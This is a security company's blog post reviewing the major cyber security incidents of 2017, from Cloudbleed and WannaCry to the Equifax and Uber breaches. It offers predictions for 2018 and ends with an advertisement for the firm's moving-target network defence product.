The year in cyber security
We are nearing the end of 2017 and a lot has happened in cyber security. One fact is that people have accepted cyber security and the connected risks as something that will naturally happen. We will see if this will lead to more consolidated efforts in strengthening your security posture or if people will get overwhelmed by the shear amount of attacks and risks they are being exposed to.
Quick facts about 2017
- More than 530 publicly disclosed data breaches (source) with Equifax being one of the biggest breaches (143 000 000 records)
- Ransomware strikes back, including WannaCry, Petya, Bad Rabbit. The damage is up 15x in two years as global damages are expected to exceed $5 billion in 2017
- New botnets and IoT botnets on the rise, for example Reaper
- Breach data shows the new way of influencing votes and elections with two massive breaches exposing US voter data collected during campaigns
A timeline of events
_Februar 2017 - Cloudbleed
The year started with a very interesting bug in the infrastructure of the content delivery network specialist Cloudflare that offers CDN, DDoS protection, cloud web application firewalls and reverse proxies. Cloudbleed itself was a bug, very similar to Heartbleed that made it possible to overflow a buffer and return memory that returned data from other customers and organizations. The data was also found and cached by search engines, which made it even harder to get rid of the implications. Affected Cloudflare customers included Fitbit, Uber and OKCupid.
_April 2017 - Shadow Brokers
The Shadow Brokers is the name of a hacker group that first appeared in August of 2016 with the famous, but unsuccessful, auction of NSA tools on the internet called the "Equation Group Cyber Weapons Auction". It addressed government sponsors of cyber warfare and was trying to sell NSA tools to other organizations. A fun fact about the auction was that it was a blind auction. So if someone bid more than the other party the money was lost. Consequently the auction was not a big success.
The group leaked a couple more tools and exploits in 2016 before it released the Eternal Blue exploit in April 2017 that was used in a variety of ransomware attacks mentioned in this blog. Rumours suggested that the Shadow Brokers might be an insider that worked for NSA's Tailored Access Operations or that this is linked to Russia.
_May 2017 - Wannacry
This family of ransomware struck worldwide in May 2017. It infected more than 230.000 computers in over 150 countries (Source). Big names and organizations were affected, like Deutsche Bahn, Telefónica, FedEx, Maersk and the british National Health service.
Wannacry infected hosts using social engineering and emails. Once exploited the ransomware encrypted local and networked drives as we have seen in many other attacks. However, this time the ransomware also used worm techniques for spreading further in the connected networks. A classical lateral movement and propagation using worm techniques. Wannacry is remarkable because it uses the EternalBlue exploit that was part of the files leaked by the Shadow Brokers.
The attack was widespread, but could have been worse if there had not been a kill switch built in (whether on purpose or by accident is not known). The kill switch was discovered by Marcus Hutchins, also known as @MalwareTech on Twitter. Wannacry, and especially the propagation in internal networks, would have been avoidable if people had put more effort on their patch management. The corresponding patch was released in March 2017 (MS17-010). Patch management and timely updating of critical assets remains one of the most effective ways to protect your organisation from security incidents, breaches and ransomware.
_June 2017 - Election data exposed on misconfigured server
A trivial misconfiguration lead to the exposure of personal details of nearly 200 million US voters on an internet facing database server. The data was originally stored for data analytics for the republican national commitee by a company called Deep Root Analytics. The purpose of the data was to influence voters during the 2016 trump campaign and to accurately predict their voting patterns and behaviours.
_June 2017 - Petya/NotPetya
Petya was another ransomware attack that started on the 27th of June 2017 in the Ukraine. Infections were also reported from France, Germany, Italy, UK and the US, however most infections affected Russia and the Ukraine. This may be partly due to the fact that Petya used a Ukrainian tax software update mechanism of a software called M.E.Doc to propagate itself. Petya infects a system through the master boot record (MBR) and forces a restart. Upon restart the disk is encrypted and a bitcoin ransom is demanded.
The NotPetya variant switched to using the EternalBlue exploit mentioned before in the Wannacry section.
_August 2017 - Wikileaks CIA Vault 7
In August wikileaks.org published a set of documents that were attributed to the CIA. The documents uncover several cyber operations carried out by the CIA and gives a great insight into state sponsored attack scenarios. It can be clearly seen how operations are structured and that we are facing a highly structured workforce. Exploit developers, operations specialists, documentation etc. show a sophisticated cyber workforce. One of the most interesting parts of this leak is the Angelfire, a so called implant that is based on different components and uses interesting techniques to disguise itself.
_September 2017 - Equifax
One of the biggest and most serious breaches happened around May-July 2017 and was published only in September 2017. The US consumer credit reporting agency collects information on over 800 million consumers and more than 88 million businesses worldwide (Source). That means Equifax has a myriad of personal identifiable information like social security numbers, names, addresses and most important credit data.
The breach included data of over 140 million US consumers, up to 44 million UK consumers and 8000 Canadian consumers. The breach included data like names, social security numbers, driver licenses, but also credit card numbers and other documents linked to the credit rating of individual customers. The Equifax breach is a great example for a failed incident response and information policy towards the public. Furthermore 3 top executives of Equifax sold stock worth 1.8 million USD shortly before making the breach public.
_September 2017 - Deloitte breach
Consulting company Deloitte suffered a bad breach that affected 244.000 employees and their account data. The breach went back as early as October 2016 - which shows how long attackers are able to infiltrate networks without being noticed. This also affected famous clients like the US DoD, DoHS and the US State department, banks like Fannie Mae and Freddie Mac and other high profile customers.
_October 2017 - BadRabbit
BadRabbit was another ransomware campaign that mainly affected Russia and the Ukraine. The attack vector was a bogus Adobe Flash installer that people had to trigger manually. The list of affected customers included many Ukrainian organizations like the Odessa Airport, the Kiev metro and the ministry of infrastructure.
_October 2017 - KRACK
KRACK (Key Reinstallation Attack) is a replay attack on the WPA2 wireless LAN authentication protocol. KRACK uses a flaw in the 4-way handshake and by continuously sending parts of the handshake as a replay during reconnections it is possible to reuse keys and potentially uncover parts or the whole of the encryption key being used.
_October 2017 - The Reaper IoT botnet
The reaper botnet is a successor of the Mirai botnet that allegedly brought down large parts of the german DTAG infrastructure in 2016. Reaper targets vulnerable IoT devices with a couple of well known exploits. Devices include routers from D-Link and Netgear, but also IP cameras from Vacron or other vendors.
The actual malware running on the target devices now has an integrated LUA scripting environment which makes it much easier to use this botnet for more advanced attacks. In October 2017 researchers from Arbor said that the size of the botnet is only between 10.000 and 20.000 devices with an additional 2 million potential botnet hosts that could be infected with said vulnerabilities.
_November 2017 - Uber
The ride sharing company Uber suffered from a bad breach disclosure in November. The breach itself seems to originate back in 2016 and disclosed personal information about over 600.000 Uber drivers including names, addresses and phone numbers for 57 million customers. Uber was not disclosing this for long and paid the hackers a 100.000$ US ransom to make them delete the stolen data.
We see a couple of trends in the cyber security landscape that will probably play a major role in 2018. Here are a couple of things we think get relevant next year:
In recent years Windows commandline and system automation got a huge bump by using the very powerful (as the name implies) powershell. By no way this is what we know from the old batch file we executed on the command prompt and cursed for it's weird syntax compared to Unix shell commands. Meanwhile crooks are using powershell for exploiting your system. The infection itself still happens by a malicious document or via drive-by or targeted attacks. However no malware binary is delivered to the endpoint, instead the power of powershell is used to carry out reconnaissance, building persistence, exfiltrate data or move laterally.
_Breaches reach system critical impacts
Equifax proves that a breach can have a critical impact. Not only are enormous amounts of personal identifiable data lost, but also financial data and social security numbers.
IoT infrastructure, be it consumer grade hardware or industrial IoT devices will become a major target. We already saw this in IoT botnets like Reaper or Mirai and will see more sophisticated attacks from those botnets next year.
The hypervisor apocalypse - this is something that might happen, or might not, but seems to be one of the biggest threats for many, many services running on Amazon or Azure. Imagine someone could exploit a guest OS to get access to the hypervisor and we see this exploited in the wild. There have been a couple of hints in the past that this has been possible, cloud providers did a great job at mitigating and patching this instantly of course.
Cryptocurrencies, wallets, the blockchain get more and more commercialised. It's easy to predict that parts of that infrastructure will have added exposure to attacks with more and more money being spent with cryptocurrencies.
The _cyel team wishes all you guys a Happy Christmas and a great start into 2018.
_cyel is the leader in Moving Target Security. We provide a Moving Target Defence solution called _equilibrium that provides a fundamental solution to the network security problem. We move, distribute and conceal the targets. Instead of preventing intrusions into a static network, it becomes a dynamic system with moving targets. Endpoints are no longer easily visible to the outside world. Every data transmission is inspected and then encrypted. Lateral movement is limited. Violations are reported. We enable zero trust network.
For more information on _cyel and _equilibrium contact _cyel for more information on a new way to segment your network and protect your assets: firstname.lastname@example.org and +41 31 522 12 20